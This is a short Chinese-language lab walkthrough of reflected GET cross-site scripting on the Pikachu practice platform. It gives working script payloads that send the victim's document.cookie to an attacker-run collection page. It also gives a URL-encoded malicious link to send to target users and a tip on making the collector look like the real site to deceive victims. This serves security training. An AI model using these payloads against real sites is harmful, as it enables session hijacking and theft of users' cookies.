GET反射型XSS利用：获取cookie

修改一下配置文件\pikachu\pkxss\xcookie\cookie.php
我这里将对应的IP地址修改为本地pikachu的主站IP地址，这样给用户造成一种正常视觉上的欺骗，容易上当。重定向到pikachu主页面

基于IP搭建的pkxss平台(入侵者的IP地址)

<script>document.location = 'http://192.168.2.160/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

我这里基于域名搭建的pkxss平台

<script>document.location = 'http://www.pikachu.net/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

输入基于域名的搭建的pkxss，在搜索框里输入链接

在皮卡丘里面的xss后台进入cookie收集

就能获取到用户的IP，cookie值，refer二，ua等相关信息

可以将referer的链接发送给对应的要攻击的用户

http://www.pikachu.net/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fwww.pikachu.net%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

如下获取相关数据对应的信息